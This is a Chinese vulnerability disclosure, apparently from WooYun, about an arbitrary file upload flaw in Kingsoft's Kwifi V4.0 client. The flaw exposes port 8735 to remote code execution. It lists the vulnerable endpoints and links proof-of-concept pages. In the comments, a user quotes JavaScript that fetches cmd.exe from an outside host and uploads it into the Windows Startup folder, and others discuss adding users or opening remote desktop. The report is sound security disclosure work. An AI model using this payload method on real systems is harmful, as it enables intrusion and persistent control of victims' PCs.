漏洞概要 关注数(62) 关注此漏洞
漏洞标题: 金山某客户端应用远程文件上传导致命令执行,突破内外网控制PC机
提交时间: 2014-08-14 18:01
修复时间: 2014-11-12 18:02
公开时间: 2014-11-12 18:02
漏洞类型: 远程代码执行
危害等级: 中
自评Rank: 20
漏洞状态: 厂商已经修复
漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系
漏洞详情
披露状态:
2014-08-14: 细节已通知厂商并且等待厂商处理中
2014-08-14: 厂商已经确认,细节仅向厂商公开
2014-10-08: 细节向核心白帽子及相关领域专家公开
2014-10-18: 细节向普通白帽子公开
2014-10-28: 细节向实习白帽子公开
2014-11-12: 厂商已经修复漏洞并主动公开,细节向公众公开
简要描述:
闪电有没有?
详细说明:
漏洞程序:
Kwifi V4.0.140813 猎豹wifi最新版本
测试环境:
Windows 7 64bit
Kwifi V4.0.140813
Firefox 31.0
Chrome 36.0.1985.143 m
漏洞详情:
当猎豹wifi运行后会向外网开放8735端口(运行web),而其某接口存在漏洞导致任意文件上传,从而导致pc机沦陷。
http://target:8735/tool/#upload
http://target:8735/api/replypic 存在漏洞导致任意文件上传
漏洞危害:
默认装C盘 可以实现挂马,指定入侵,拓展大企业内网监控pc机等;
部分测试环境默认安装在D盘(wooyun工作人员测试时出现,我测试时无论是官网最新版本还是百度下载的猎豹wifi都装在C盘);
漏洞证明:
当kwifi外网环境时:
当kwifi为内网环境时:
firefox 和google chrome下有效
修复方案:
视频:http://**.**.**.**/kwifi.wmv
演示个cmd,上马过金山等也是可以的~
下面给一个通用型测试payload:
若安装到c盘,则开启wifi后访问下述链接,安装cmd.exe程序到系统启动项
http://**.**.**.**/kwifi/2.html
若安装到d盘,则开启wifi后访问下述链接,安装cmd.exe程序到d盘根目录
http://**.**.**.**/kwifi/3.html
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-08-14 19:53
厂商回复:
非常感谢您的提交
最新状态:
2014-11-12:已经修复
2014-11-12:漏洞已修复
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(少于3人评价):
评价
-
2014-08-14 18:12 |
zeracker ![金山某客户端应用远程文件上传导致命令执行,突破内外网控制PC机]()
( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)
0
-
2014-08-14 18:13 |
itleaf ( 普通白帽子 | Rank:140 漏洞数:17 )
0
-
2014-08-14 18:31 |
疯狗 ![金山某客户端应用远程文件上传导致命令执行,突破内外网控制PC机]()
( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
1
-
2014-08-14 18:34 |
itleaf ( 普通白帽子 | Rank:140 漏洞数:17 )
0
-
2014-08-14 18:38 |
疯狗 ![金山某客户端应用远程文件上传导致命令执行,突破内外网控制PC机]()
( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
0
-
2014-08-14 18:50 |
安然意境 ( 普通白帽子 | Rank:194 漏洞数:83 | 暗室中很难找到黑猫,尤其当里面根本没猫的...)
0
-
2014-08-14 19:04 |
大大灰狼 ( 普通白帽子 | Rank:278 漏洞数:64 | Newbie)
0
-
2014-08-14 19:49 |
HackBraid ![金山某客户端应用远程文件上传导致命令执行,突破内外网控制PC机]()
( 核心白帽子 | Rank:1914 漏洞数:304 | 最近有人冒充该账号行骗,任何自称HackBrai...)
0
-
2014-08-14 21:09 |
xsser ![金山某客户端应用远程文件上传导致命令执行,突破内外网控制PC机]()
( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
0
-
2014-08-14 21:23 |
itleaf ( 普通白帽子 | Rank:140 漏洞数:17 )
0
-
2014-08-15 13:08 |
itleaf ( 普通白帽子 | Rank:140 漏洞数:17 )
0
厂商最新版已经修复,百度搜索下载任有效,安装到D盘,请删除D盘Program Files (x86)文件夹或在虚拟机里测试,win7 64bit firefox chrome测试成功,exp自行按需更改
-
2014-11-12 19:06 |
大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )
1
。。不明白CMD哪来的你说的上传也没见上传CMD啊
-
2014-11-12 19:27 |
itleaf ( 普通白帽子 | Rank:140 漏洞数:17 )
1
-
2014-11-12 19:42 |
萌萌哒-花粉 ( 路人 | Rank:4 漏洞数:5 | 多乌云 多美女 花粉 顾名思义 就是校花班花...)
1
金山 我喜欢这厂商 虽然和我想不不一样 但是的确很刁 值得学习
-
2014-11-12 20:27 |
1c3z ( 普通白帽子 | Rank:307 漏洞数:64 | @)!^)
1
@大白菜 在script有下面这段代码 var start = function() { var c = load_binary_resource('cmd.exe'); fileUpload(c, 'cmd.exe'); }; start(); 先用ajax的方式远程读取cmd.exe再上传 cmd.exe地址 http://xssae.sinaapp.com/kwifi/cmd.exe
-
2014-11-13 00:02 |
大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )
1
@1c3z ...那能执行添加用户的命令吗?或者开3389 或者执行远程木马
-
2014-11-13 11:08 |
1c3z ( 普通白帽子 | Rank:307 漏洞数:64 | @)!^)
1
@大白菜 安装cmd.exe程序到系统启动项 ProgramData/Microsoft/Windows/Start%20Menu/Programs/Startup 开机自启动
-
2014-11-13 14:37 |
大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )
1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
https://cn-sec.com/archives/22517.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论